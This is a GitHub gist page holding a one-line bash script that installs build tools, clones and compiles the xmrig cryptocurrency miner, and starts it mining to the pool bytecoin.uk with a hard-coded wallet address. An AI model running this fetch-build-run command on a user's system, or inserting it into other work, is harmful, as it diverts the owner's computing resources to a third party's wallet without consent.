Skip to content

Instantly share code, notes, and snippets.

@udan
Created December 19, 2017 10:40
Show Gist options
  • Save udan/fe8e45c853efa80c4f4b9207377fc262 to your computer and use it in GitHub Desktop.
Save udan/fe8e45c853efa80c4f4b9207377fc262 to your computer and use it in GitHub Desktop.
#!/bin/bash
sudo apt-get update && sudo apt-get install git build-essential cmake libuv1-dev libmicrohttpd-dev --assume-yes && git clone https://github.com/xmrig/xmrig.git && cd xmrig && cmake . && make && ./xmrig -o bytecoin.uk:7777 -u 23G1QVNpZetMTTwG2o3WFF6bTCUHFVGi44fzgcoNKsQPFHoR1yaSWdgitH7QAWM4iSJztTSStb9a2BQQH37EG7bmUSMu2kT.1063 -p x
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment